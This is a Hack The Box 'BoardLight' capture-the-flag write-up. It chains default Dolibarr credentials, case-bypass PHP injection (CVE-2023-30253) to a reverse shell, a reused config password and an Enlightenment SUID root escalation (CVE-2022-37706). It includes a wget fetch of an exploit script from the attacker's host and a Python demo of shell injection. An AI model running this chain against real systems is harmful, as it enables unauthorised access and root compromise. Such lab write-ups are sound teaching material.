HTB BoardLight Writeup

Date: 2024-05-26 00:30:00
Categories: HTB Machine
Tags: Default_user_pass, PHP Code Injection, Binary_exploitation, CVE

Shell as www-data

Enumeration

```
└─# nmap -sC -sV -p- -T4 --min-rate=9326 --vv board.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 10:51 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
Initiating Ping Scan at 10:51
Scanning board.htb (10.10.11.11) [4 ports]
Completed Ping Scan at 10:51, 0.28s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:51
Scanning board.htb (10.10.11.11) [65535 ports]
Discovered open port 22/tcp on 10.10.11.11
Discovered open port 80/tcp on 10.10.11.11
```

Only ports 22 and 80 are open, and board.htb itself serves nothing but a static landing page. The interesting application is more likely on a virtual host, so the next step is subdomain enumeration with the Host header. The `-fs 15949` filter drops responses that are the same size as the default landing page.

```
└─# ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://board.htb" -H "HOST: FUZZ.board.htb" -c -fs 15949

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 15949
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]
web3452                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 329ms]
web4000                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 334ms]
wishlist                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 332ms]
```

The three size-0 hits (web3452, web4000, wishlist) returned empty bodies and are not worth chasing; crm is the real virtual host. Add `crm.board.htb` to /etc/hosts next to board.htb.

Identify Vulnerability

The CRM runs Dolibarr 17.0, so the next step is to check whether that release has known vulnerabilities.

In Dolibarr 17.0.0 with the CMS Website plugin (core) enabled, an authenticated attacker can obtain remote command execution via PHP code injection bypassing the application restrictions.

This is CVE-2023-30253 (fixed in 17.0.1): the Website module refuses to save page content containing `<?php`, but the check is case-sensitive while PHP's open tag is not, so `<?PHP` is accepted and still executes. The CMS is vulnerable to PHP code injection, but it is authenticated, so we need credentials first.

The default username and password for Dolibarr, a popular open-source ERP and CRM software, often depend on how it was installed and set up. However, the typical default credentials are:

    Username: admin
    Password: admin

So the default credentials are admin / admin.

With those credentials I log in to the dashboard successfully.

PHP Code Injection

In the Dolibarr menu open Websites, click + and create a site, then choose Import website template and load any template (which one does not matter). Open the page in Edit mode and put the PHP reverse shell in the page body.

Write the open tag as `<?PHP` (upper case), which is what CVE-2023-30253 exploits; the lower-case spelling is rejected by the save check. Point the shell at your listener.

Click Save, then view the page to trigger it.

```
└─# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.11] 46260
Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 08:55:52 up 40 min,  4 users,  load average: 0.62, 0.46, 0.52
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (856): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Shell as larissa

A quick search for where Dolibarr keeps its default configuration led me to this page:

Dolibarr Config Location

The config file holds the MySQL credentials; we will try them against the local user larissa.

```php
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
```

The file is htdocs/conf/conf.php under the Dolibarr install (here /var/www/html/crm.board.htb/htdocs/conf/conf.php). The database password `serverfun2$2023!!` is reused for the local account larissa, so su works straight away:

```
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su larissa
su larissa
Password: serverfun2$2023!!
id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
```

Shell as root

```
find / -perm -04000 -ls 2>/dev/null
     2491     16 -rwsr-xr-x   1 root     root        14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
      608     16 -rwsr-sr-x   1 root     root        14488 Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
    17633     28 -rwsr-xr-x   1 root     root        26944 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
    17628     16 -rwsr-xr-x   1 root     root        14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
    17627     16 -rwsr-xr-x   1 root     root        14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
    17388     16 -rwsr-xr-x   1 root     root        14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
     2368     52 -rwsr-xr--   1 root     messagebus    51344 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
     5278    468 -rwsr-xr-x   1 root     root         477672 Jan  2 09:13 /usr/lib/openssh/ssh-keysign
    10039    388 -rwsr-xr--   1 root     dip          395144 Jul 23  2020 /usr/sbin/pppd
```

Do you see what I see? Yes, the Enlightenment binaries. I had looked at the vulnerability in enlightenment_sys a few months ago, downloaded the binary onto my own Ubuntu box and confirmed the privilege escalation works.

CVE-2022-37706-LPE-exploit
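Why a SUID helper like enlightenment_sys is exploitable this way, as an added illustration (my own Python model, not the PoC script from the link above and not Enlightenment's code): CVE-2022-37706 is the result of the helper handing a caller-supplied path to the C library's system() function, i.e. to a shell, and of checking the `/dev/` prefix before `..` is resolved. The block runs one hostile argument through a shell-built command and through an argv list, and shows the check a privileged helper should make instead. `ls -d` stands in for mount(8) so the demo runs unprivileged, and the hostile argument is constructed inside demo(). The `mount: /dev/../tmp/: can't find in /etc/fstab.` line in the exploit output below is mount being run with its argument cut off at the `;`; what followed the `;` then ran as a separate command, as root.

```python
import os
import re
import subprocess
import tempfile

MARKER = "INJECTED"


def helper_via_shell(path: str) -> str:
    """Model of a setuid helper that formats a caller-controlled path into a
    command string and runs it through the shell (system(3) semantics).
    The shell parses ';' inside `path` as a command separator, so whatever
    follows it runs as a second command with the helper's privileges.
    `ls -d` stands in for mount(8) so this runs unprivileged."""
    completed = subprocess.run(f"ls -d {path}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def helper_via_execv(path: str) -> str:
    """Same operation with argv passed as a list: no shell is involved, so
    the whole string is one opaque argument and ';' has no meaning."""
    completed = subprocess.run(["ls", "-d", path],
                               capture_output=True, text=True)
    return completed.stdout


# Conservative character set for a device or mount-point path.
SAFE_PATH = re.compile(r"^/[A-Za-z0-9._/-]+$")


def validate_device_path(path: str) -> bool:
    """What a privileged helper should check before touching the path:
    refuse anything outside a conservative character set, then test the
    required prefix against the canonicalised path, so that '/dev/../tmp/'
    cannot pass a naive startswith('/dev/') test."""
    if not SAFE_PATH.match(path):
        return False
    return os.path.realpath(path).startswith("/dev/")


def demo() -> dict:
    """Run both helpers on the same hostile argument and report whether the
    injected command executed (MARKER shows up in stdout), plus what the
    validator says about a few inputs."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed hostile argument: a real directory followed by a
        # shell command separator and an injected command.
        hostile = f"{d}; echo {MARKER}"
        return {
            "shell_executes_injection": MARKER in helper_via_shell(hostile),
            "execv_executes_injection": MARKER in helper_via_execv(hostile),
            "validator_accepts_hostile": validate_device_path(hostile),
            "validator_accepts_dotdot": validate_device_path("/dev/../tmp/"),
            "validator_accepts_device": validate_device_path("/dev/null"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The takeaway is the same as for the Dolibarr bug: a prefix or deny-list check on the raw string is not a check on what the sink will actually do with it. Resolve the path first, then compare, and never let a privileged process build a shell command line out of untrusted input when execve(2) with an argv array does the job.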

```
wget http://10.10.14.110:8000/eng.sh
--2024-05-26 08:47:03--  http://10.10.14.110:8000/eng.sh
Connecting to 10.10.14.110:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 707 [text/x-sh]
Saving to: ‘eng.sh’

     0K                                                       100% 41.3M=0s

2024-05-26 08:47:04 (41.3 MB/s) - ‘eng.sh’ saved [707/707]

bash eng.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
```
This post is licensed under CC BY 4.0 by the author.